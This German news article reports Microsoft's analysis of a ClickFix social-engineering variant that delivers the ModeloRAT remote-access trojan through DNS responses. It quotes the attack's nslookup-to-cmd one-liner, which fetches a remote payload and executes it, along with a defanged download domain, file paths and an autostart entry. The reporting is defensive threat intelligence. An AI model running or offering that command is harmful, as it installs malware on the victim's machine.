Bei ClickFix-Angriffen verleiten Cyberkriminelle ihre Opfer dazu, einen Befehl auf dem Rechner auszuführen, der angeblich ein Problem lösen soll. Tatsächlich installiert der jedoch Malware aus dem Internet. Eine neue Variante setzt dabei auf DNS-Antworten zur Verteilung der Schadsoftware.
Das hat Microsofts Threat-Intelligence-Team auf Linkedin bekannt gegeben. Um der Erkennung zu entgehen, setzen die Angreifer nun darauf, einen vermeintlich harmlosen „nslookup“-Befehl abzusetzen. Microsoft zeigt den Beispielaufruf von cmd /c ”nslookup example.com 84.xx.yy.zz | findstr ”^Name:” | for /f ”tokens=1,* delims=:” %a in (’more’) do @echo %b” cmd && exit\1 – dieser Befehl wird offenbar auch verschleiert mit eingeworfenen Sonderzeichen („^") überliefert.
Microsoft: DNS-Antwort enthält Schadcode
Dieser Befehl fragt beim Zielserver mit der hier verschleierten IP-Adresse nach einer Auflösung für den Domain-Namen „example.com“. Die „Name:“-Antwort verarbeitet der Befehl dann, um den Schadcode der nächsten Infektionsstufe zu empfangen und auszuführen, erklären die IT-Forscher aus dem Microsoft-Defender-Team. Dieser Angriff umgeht klassischen Malware-Schutz, zudem sieht die serverseitige DNS-Antwort für Virenschutz in der Regel unverdächtig aus – anders als üblicherweise genauer untersuchter Netzwerkverkehr etwa von Webservern.
Der Schadcode aus der DNS-Antwort lädt dann eine .zip-Datei von „hxxp://azwsappdev[.]com/“ herunter, aus dem ein Portable-Python-Bundle sowie bösartiger Python-Code extrahiert werden. Der ausgeführte Python-Code untersucht die vorgefundene Windows-Umgebung und lädt schließlich die finale Infektionsstufe nach, die als „%APPDATA%\WPy64-31401\python\script.vbs“ im Dateisystem landet und mittels „%STARTUP%/MonitoringService.lnk“ im Autostart eingerichtet wird. Es handelt sich dabei um einen Fernzugriff-Trojaner namens „ModeloRAT“.
Bei ClickFix handelt es sich um Social-Engineering-Angriffe, die in der Regel über Phishing, Malvertising oder Drive-by-Köder (etwa gefälschte Captcha- oder „Beheben Sie dieses Problem”-Dialoge) eingesetzt wird, um Benutzer dazu zu verleiten, einen Befehl zu kopieren, einzufügen und auszuführen, fasst Microsoft diese Attacken-Variante zusammen. Gegen Drahtzieher solcher Angriffe gehen auch internationale Strafverfolger immer wieder vor. So konnten im Rahmen der „Operation Endgame 2.0“ etwa hunderte Server außer Gefecht gesetzt werden, die unter anderem ebenfalls für ClickFix-Attacken genutzt wurden.
(dmk)
English (US) ·